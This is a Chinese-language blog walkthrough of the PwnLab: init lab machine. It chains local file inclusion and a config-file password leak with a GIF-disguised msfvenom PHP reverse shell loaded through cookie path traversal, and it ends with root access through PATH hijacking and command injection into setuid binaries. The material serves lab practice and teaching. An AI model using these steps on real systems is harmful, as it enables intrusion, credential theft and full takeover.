[Write-up]-pwnlab_init

关于

  • 下载地址点我
  • Flag: /root/flag.txt
  • 放假的第一天
  • 哔哩哔哩视频

信息收集

nmap -sn 192.168.7.1/24 
Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.1
Host is up (0.00071s latency).
Nmap scan report for 192.168.7.130
Host is up (0.00060s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.39 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST
Nmap scan report for 192.168.7.130
Host is up (0.00098s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          44040/tcp  status
|_  100024  1          51756/udp  status
3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 53
|   Version: .5.47-0+deb8u1
|   Thread ID: 84
|   Capabilities flags: 63487
|   Some Capabilities: SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsCompression, LongColumnFlag, Speaks41ProtocolNew, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, IgnoreSigpipes, ODBCClient
|   Status: Autocommit
|_  Salt: "]0w'Xi((0XLS:j'"r<q

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds
  1. 开了80和3306端口,系统Debian,打开Web看看
  2. 发现URL有一个规律,可能page后面跟着是一个文件名,但是没有后缀名
<?php if(isset($_GET['page'])){
include($_GET['page'].".php")
?>

我们猜测index的代码像上面的功能一样。

http://192.168.7.130/?page=login
http://192.168.7.130/?page=upload
  1. 可能存在LFI(local file inclusion)漏洞
  2. 构造URLhttp://192.168.7.130/?page=php://filter/convert.base64-encode/resource=login
  3. 发现可以包含读到文件,然后base64解密
---login.php---

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
	$luser = $_POST['user'];
	$lpass = base64_encode($_POST['pass']);

	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
	$stmt->bind_param('ss', $luser, $lpass);

	$stmt->execute();
	$stmt->store_Result();

	if ($stmt->num_rows == 1)
	{
		$_SESSION['user'] = $luser;
		header('Location: ?page=upload');
	}
	else
	{
		echo "Login failed.";
	}
}
else
{
	?>
	<form action="" method="POST">
	<label>Username: </label><input id="user" type="test" name="user"><br />
	<label>Password: </label><input id="pass" type="password" name="pass"><br />
	<input type="submit" name="submit" value="Login">
	</form>
	<?php
}

  1. 跟着再把require中的config读出来
<?php
$server	  = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>% 
  1. 顺便也把index和upload的也读了
---index---
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
	include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
	if (isset($_GET['page']))
	{
		include($_GET['page'].".php");
	}
	else
	{
		echo "Use this server to upload and share image files inside the intranet";
	}
?>
</center>
</body>
</html>% 

---upload---

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
	<body>
		<form action='' method='post' enctype='multipart/form-data'>
			<input type='file' name='file' id='file' />
			<input type='submit' name='submit' value='Upload'/>
		</form>
	</body>
</html>
<?php 
if(isset($_POST['submit'])) {
	if ($_FILES['file']['error'] <= 0) {
		$filename  = $_FILES['file']['name'];
		$filetype  = $_FILES['file']['type'];
		$uploaddir = 'upload/';
		$file_ext  = strrchr($filename, '.');
		$imageinfo = getimagesize($_FILES['file']['tmp_name']);
		$whitelist = array(".jpg",".jpeg",".gif",".png"); 

		if (!(in_array($file_ext, $whitelist))) {
			die('Not allowed extension, please upload images only.');
		}

		if(strpos($filetype,'image') === false) {
			die('Error 001');
		}

		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
			die('Error 002');
		}

		if(substr_count($filetype, '/')>1){
			die('Error 003');
		}

		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
			echo "<img src=\"".$uploadfile."\"><br />";
		} else {
			die('Error 4');
		}
	}
}

?>%
  1. 在上面已经拿到了MySQL的账号密码了,而且在用nmap扫的时候已经发现3306端口是开放的。
  2. mysql -h 192.168.7.130 -u root -D Users -p密码是config文件的那个,自行解密。
mysql> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> select * from users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |---JWzXuBJJNy
| mike | U0lmZHNURW42SQ== |---SIfdsTEn6I
| kane | aVN2NVltMkdSbw== |---iSv5Ym2GRo
+------+------------------+
3 rows in set (0.01 sec)
  1. 登录上传文件试试,上面的源码已经知道只能上传图片后缀的文件,而且还判了文件类型和mime

绕过上传

  • 方法1:在木马上加图片标志绕过
  1. echo GIF89a > kali.gif
  2. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.7.1 LPORT=7788 R >>kali.gif
  • 方法2:上BurpSuite,你们比我熟练。
  1. 上传之后会返回一个相对路径就是文件的md5upload/51c65dd716e81189745d6eb1c9f1bb6b.gif
  2. 直接打开是不会解析的,但是index文件那还有一个文件包含,文件路径可以通过cookie传进去
  3. curl --cookie "lang=../../../../../../etc/passwd" "http://192.168.7.130"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
john:x:1000:1000:,,,:/home/john:/bin/bash
kent:x:1001:1001:,,,:/home/kent:/bin/bash
mike:x:1002:1002:,,,:/home/mike:/bin/bash
kane:x:1003:1003:,,,:/home/kane:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
Use this server to upload and share image files inside the intranet</center>
</body>
</html>%
  1. 发现可以,把../../../../etc/passwd换刚刚上传的木马路径
  2. curl --cookie "lang=../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif" "http://192.168.7.130"
  3. 发现meterpreter那边已经获取到回话了。
[*] Started reverse TCP handler on 192.168.7.1:7788 
[*] Meterpreter session 1 opened (192.168.7.1:7788 -> 192.168.7.130:55888) at 2018-07-10 14:19:16 +0800

meterpreter >

提权

  1. 还是以前的套路python -c 'import pty;pty.spawn("/bin/bash")'拿数据库的密码去登录各个用户
  2. 发现kane的密码可以登录,在他的home目录找到了一个属于mike用户的ELF可执行文件
kane@pwnlab:~$ file msgmike
file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
  1. 执行报没有mike用户目录下的文件,把他下载回来,先用Python中的python -m SimpleHTTPServer搭建一个简单的http服务。浏览器打开192.168.7.130:8000
python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET / HTTP/1.1" 200 -
192.168.7.1 - - [10/Jul/2018 02:39:26] code 404, message File not found
192.168.7.1 - - [10/Jul/2018 02:39:26] "GET /favicon.ico HTTP/1.1" 404 -
192.168.7.1 - - [10/Jul/2018 02:39:28] "GET /msgmike HTTP/1.1" 200 -
  1. 简单拖进IDA看看cat /home/mike/msg.txt它使用了带参数的系统函数,我们把环境变量改为当前目录。

  2. 可以修改PATH变量,从而将这个“cat”转换为shell:

kane@pwnlab:~$ ./msgmike
./msgmike
cat: /home/mike/msg.txt: No such file or directory
kane@pwnlab:~$ echo "/bin/bash" > cat  
echo "/bin/bash" > cat
kane@pwnlab:~$ ls
ls
cat  msgmike
kane@pwnlab:~$ chmod 777 cat
chmod 777 cat
kane@pwnlab:~$ export PATH=/home/kane
export PATH=/home/kane
kane@pwnlab:~$ ./msgmike
./msgmike
bash: dircolors: command not found
bash: ls: command not found
mike@pwnlab:~$ 

  1. 现在用户变成Mike了,再把PATH改回来export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin就可以了。现在到Mike的home目录发现有一个文件msg2root继续拖进IDA发现"/bin/echo %s >> /root/messages.txt"
  2. 这是把用户传进的字符串打印出来,但如果字符串里有分隔符的话就可能跟着执行了下一个命令。而且是root权限。
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id ; whoami
id ; whoami
id
root
mike@pwnlab:/home/mike$ 

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: asdasdasdas;/bin/sh
asdasdasdas;/bin/sh
asdasdasdas
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
cd /root
ls
flag.txt  messages.txt
cat flag.txt

.-=~=-.                                                                 .-=~=-.
(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)
(_ ___)  _____                             _                            (_ ___)
(__  _) /  __ \                           | |                           (__  _)
( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)
(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)
(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)
( _ __)                     __/ |                                       ( _ __)
(__  _)                    |___/                                        (__  _)
(__  _)                                                                 (__  _)
(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)
( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)
(__  _) this challenge.                                                 (__  _)
(_ ___)                                                                 (_ ___)
( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)
(__  _) reading it                                                      (__  _)
(__  _)                                                                 (__  _)
(__  _)                                             For sniferl4bs.com  (__  _)
( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)
(__  _)                                                                 (__  _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-'                                                                 `-._.-'
# 
posted @ 2020-01-19 08:52  三米前有蕉皮  阅读(739)  评论(0编辑  收藏  举报